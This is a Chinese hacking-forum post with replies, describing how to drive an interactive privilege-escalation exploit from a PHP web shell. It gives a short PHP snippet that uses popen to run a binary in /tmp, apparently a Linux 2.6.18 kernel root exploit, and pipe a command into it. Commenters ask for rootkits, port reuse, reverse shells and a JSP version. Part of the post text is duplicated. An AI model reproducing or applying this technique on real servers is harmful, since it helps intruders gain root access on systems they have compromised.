PHP 非交互式 执行交互式命令
提权转发不出来
只能出此下策
shell可以用except来执行交互命令
python 也有pexcept模块
perl也有except模块
但是默认不安装
咱们还是用牛逼的php吧
我就不解释了 看懂的人自然就懂了
代码
再补一张图
只能出此下策
shell可以用except来执行交互命令
python 也有pexcept模块
perl也有except模块
但是默认不安装
咱们还是用牛逼的php吧
我就不解释了 看懂的人自然就懂了
代码
<?php
$sucommand = "/tmp/2.6.18-2011";
$fp = popen($sucommand ,"w");
@fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");
@pclose($fp);
?>
再补一张图
评论55次
恩,条条大路通罗马。
好东西,不错,支持一个
好办法,mark,有没交互式的。
mark。。。。
没看 明白
很好点思路
收藏一下 感谢
和python的popen一样
看起来很厉害的样子
要是只支持jsp怎么办?私,,,
感谢分享!!
学xi了 方法很好
@anlfi 这个想法难道就是传说中的应用层ROOTKIT?
大牛。 有木有jsp下 执行的? jsp非交互式 执行交互式命令提权
mark.........
这个得收藏啊
测试了下 不知道提权没成功还是怎么 权限还是apache 悲催啊
复用你可以考虑apache的mod之类的~~
他能给你推荐出端口复用的已经很不错了 反弹?有也是最少几万RBM一个。我想想不会掉下5万
。。。就是不知道有神马好用的ROOTKIT。。求推荐。。如果不能反弹,估计多半只能复用了。偶对LINUX搞得少,确实不知道有神马好用的ROOTKIT。